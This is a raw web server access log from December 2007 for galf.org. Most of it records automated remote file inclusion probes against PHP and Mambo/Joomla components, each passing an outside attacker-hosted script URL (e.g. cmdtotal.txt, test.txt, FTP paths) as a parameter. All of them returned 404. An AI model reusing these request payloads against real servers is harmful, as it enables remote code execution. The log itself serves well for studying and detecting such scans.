217.151.228.18 - - [02/Dec/2007:19:40:53 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:19:40:56 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:19:43:17 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
202.60.74.106 - - [02/Dec/2007:19:45:58 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.17.81.2 - - [02/Dec/2007:19:48:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
80.190.193.116 - - [02/Dec/2007:19:49:05 -0800] "GET /logs/access_070917.log/talkback/comments-display-tpl.php?language_file=http://www.lesovik.de/files/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.17.81.2 - - [02/Dec/2007:19:50:33 -0800] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
83.17.81.2 - - [02/Dec/2007:19:50:33 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.108.66.70 - - [02/Dec/2007:19:53:36 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.181.240.100 - - [02/Dec/2007:19:56:12 -0800] "GET /logs/access_070820.log/index2.php?x=http://pilliciyiz.biz/logs/httpdocs? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.181.240.100 - - [02/Dec/2007:19:56:12 -0800] "GET /index2.php?x=http://pilliciyiz.biz/logs/httpdocs? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.181.240.100 - - [02/Dec/2007:19:56:12 -0800] "GET /logs/index2.php?x=http://pilliciyiz.biz/logs/httpdocs? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.181.240.100 - - [02/Dec/2007:19:56:13 -0800] "GET /logs/access_070730.log/index2.php?x=http://pilliciyiz.biz/logs/httpdocs? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.27.152.18 - - [02/Dec/2007:20:00:15 -0800] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i-play.org/files/..../ID.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.220.59.5 - - [02/Dec/2007:20:03:07 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:20:05:40 -0800] "GET /logs////////////components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:20:05:41 -0800] "GET ////////////components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.149.230.152 - - [02/Dec/2007:20:07:17 -0800] "GET /logs/access.log/index.php?pag=http://www.pavomexicano.com/vnc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.149.230.152 - - [02/Dec/2007:20:07:18 -0800] "GET /index.php?pag=http://www.pavomexicano.com/vnc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.149.230.152 - - [02/Dec/2007:20:07:18 -0800] "GET /logs/index.php?pag=http://www.pavomexicano.com/vnc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:20:08:39 -0800] "GET /logs////////components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:20:08:40 -0800] "GET ////////components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:01 -0800] "GET / HTTP/1.1" 200 1048 "http://espanol.iwhc.org/programasregionales/americalatina/peru/colegas/galf.cfm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:03 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:08 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:10 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/labia/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
74.6.22.173 - - [02/Dec/2007:20:12:10 -0800] "GET /logs/access_071028.log HTTP/1.0" 200 1179648 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:11 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:12 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/cendoc/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:14 -0800] "GET /logs/ HTTP/1.1" 200 5371 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:17 -0800] "GET /logs/access_070521.log HTTP/1.1" 200 199384 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:37 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
190.42.54.42 - - [02/Dec/2007:20:12:39 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.galf.org"
67.35.240.24 - - [02/Dec/2007:20:14:59 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.com/search?num=50&hl=en&safe=off&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=index+of+labia&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.galf.org"
67.35.240.24 - - [02/Dec/2007:20:15:00 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.galf.org"
62.149.230.152 - - [02/Dec/2007:20:17:43 -0800] "GET /logs/access_070820.log/index.php?pag=http://www.pavomexicano.com/vnc/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
82.122.224.146 - - [02/Dec/2007:20:20:01 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:20:20:02 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
195.220.59.5 - - [02/Dec/2007:20:35:48 -0800] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.220.59.5 - - [02/Dec/2007:20:35:48 -0800] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:20:35:48 -0800] "GET /logs/access_071015.log////////components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:20:35:52 -0800] "GET /logs/access_070820.log////////components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.125.203.211 - - [02/Dec/2007:20:36:04 -0800] "GET /logs/index2.php?x=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.125.203.211 - - [02/Dec/2007:20:36:04 -0800] "GET /index2.php?x=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:20:36:59 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:20:36:59 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:20:37:00 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:20:37:34 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:20:37:36 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:20:38:06 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:20:38:07 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:20:38:07 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:20:38:08 -0800] "GET /logs/access_071014.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:20:38:10 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.102.0.108 - - [02/Dec/2007:20:38:23 -0800] "GET /logs/access_070730.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://124.0.201.20/bbs000/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
212.102.0.108 - - [02/Dec/2007:20:38:23 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://124.0.201.20/bbs000/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.102.0.108 - - [02/Dec/2007:20:38:24 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://124.0.201.20/bbs000/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:20:38:29 -0800] "GET /logs/access_071119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
65.55.208.230 - - [02/Dec/2007:20:38:31 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.230 - - [02/Dec/2007:20:38:31 -0800] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
81.169.185.250 - - [02/Dec/2007:20:39:22 -0800] "GET /logs/access_070910.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
88.131.106.16 - - [02/Dec/2007:20:41:16 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [02/Dec/2007:20:41:17 -0800] "GET /labia/?N=A HTTP/1.0" 200 508 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
212.102.0.108 - - [02/Dec/2007:20:42:20 -0800] "GET /logs/access_070910.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://124.0.201.20/bbs000/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:20:44:19 -0800] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.151.228.18 - - [02/Dec/2007:20:45:00 -0800] "GET /logs/access_070625.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:20:47:32 -0800] "GET /logs/access_071014.log/dotproject/modules/files/index_table.php?root_dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:20:47:32 -0800] "GET /dotproject/modules/files/index_table.php?root_dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:20:47:32 -0800] "GET /logs/dotproject/modules/files/index_table.php?root_dir=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:20:48:04 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:20:48:04 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.195.47.248 - - [02/Dec/2007:20:48:06 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.195.47.248 - - [02/Dec/2007:20:48:09 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.220.59.5 - - [02/Dec/2007:20:48:37 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.220.59.5 - - [02/Dec/2007:20:48:37 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.220.59.5 - - [02/Dec/2007:20:49:31 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.220.59.5 - - [02/Dec/2007:20:49:31 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.122.224.146 - - [02/Dec/2007:20:49:39 -0800] "GET /oneadmin/adminfoot.php?path%5Bdocroot%5D=http://124.0.201.20/bbs000/test.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
64.79.215.67 - - [02/Dec/2007:20:50:41 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.daynger.com/blog/wp-componenents/.tmp/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.79.215.67 - - [02/Dec/2007:20:50:41 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.daynger.com/blog/wp-componenents/.tmp/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.102.0.108 - - [02/Dec/2007:20:54:32 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://124.0.201.20/bbs000/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.102.0.108 - - [02/Dec/2007:20:54:32 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://124.0.201.20/bbs000/test.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
77.74.197.217 - - [02/Dec/2007:20:55:42 -0800] "GET /logs/access_071008.log/index.php?p=http://www.wieringafamily.net/albums/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.74.197.217 - - [02/Dec/2007:20:55:42 -0800] "GET /index.php?p=http://www.wieringafamily.net/albums/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
77.74.197.217 - - [02/Dec/2007:20:55:43 -0800] "GET /logs/index.php?p=http://www.wieringafamily.net/albums/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
38.114.104.57 - - [02/Dec/2007:20:58:36 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.galf.org"
38.114.104.42 - - [02/Dec/2007:20:58:37 -0800] "GET /logs/access_071022.log HTTP/1.0" 200 262144 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:21:00:03 -0800] "GET /logs/access_070716.log////////////components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.131.106.16 - - [02/Dec/2007:21:00:40 -0800] "GET /?S=A HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
212.175.205.226 - - [02/Dec/2007:21:00:48 -0800] "GET /logs/access_070820.log////////////components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.x-fox.de/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [02/Dec/2007:21:05:12 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.ziaaddils.uklinux.net/bookmark4u/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.150.12 - - [02/Dec/2007:21:05:12 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.ziaaddils.uklinux.net/bookmark4u/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.218.250.201 - - [02/Dec/2007:21:07:44 -0800] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.218.250.201 - - [02/Dec/2007:21:07:44 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:21:09:40 -0800] "GET /logs/access_070820.log/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
81.169.185.250 - - [02/Dec/2007:21:09:40 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.185.250 - - [02/Dec/2007:21:09:41 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:11:19 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:11:19 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:11:19 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.200.57.200 - - [02/Dec/2007:21:12:02 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:12:03 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:12:03 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:12:27 -0800] "GET /logs/access_070820.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.98.150.12 - - [02/Dec/2007:21:13:38 -0800] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.ziaaddils.uklinux.net/bookmark4u/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.98.150.12 - - [02/Dec/2007:21:13:38 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.ziaaddils.uklinux.net/bookmark4u/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.200.57.200 - - [02/Dec/2007:21:14:54 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:14:54 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:14:55 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:14:55 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.98.150.12 - - [02/Dec/2007:21:15:13 -0800] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.98.150.12 - - [02/Dec/2007:21:15:14 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.218.250.201 - - [02/Dec/2007:21:15:42 -0800] "GET /logs/access_070827.log/components/com_hashcash/server.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.218.250.201 - - [02/Dec/2007:21:16:24 -0800] "GET /logs/access_071105.log/components/com_hashcash/server.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:16:55 -0800] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:17:09 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:17:10 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:17:10 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.200.57.200 - - [02/Dec/2007:21:17:11 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
